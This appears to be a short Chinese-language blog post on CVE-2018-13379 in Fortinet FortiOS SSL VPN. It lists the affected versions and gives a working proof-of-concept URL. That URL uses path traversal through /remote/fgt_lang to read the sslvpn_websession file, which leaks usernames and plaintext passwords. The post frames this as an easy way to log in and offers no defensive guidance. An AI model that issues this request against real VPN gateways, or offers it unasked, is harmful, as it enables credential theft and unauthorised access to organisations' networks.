飞塔vpn账号密码泄露(CVE-2018-13379)

影响版本

Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 under SSL VPN web portal

飞塔vpn账号密码泄露(CVE-2018-13379)

利用CVE-2018-13379来泄露会话文件。这个session文件中包含一些有价值的信息,比如用户名以及明文密码,这样我们就可以轻松登录。

poc

https://x.x.x.x/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

这里我们需要猜一下哪个是用户名和密码

飞塔vpn账号密码泄露(CVE-2018-13379)

上一篇:Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199复现


下一篇:【更新:POC公开】F5 多个严重漏洞通告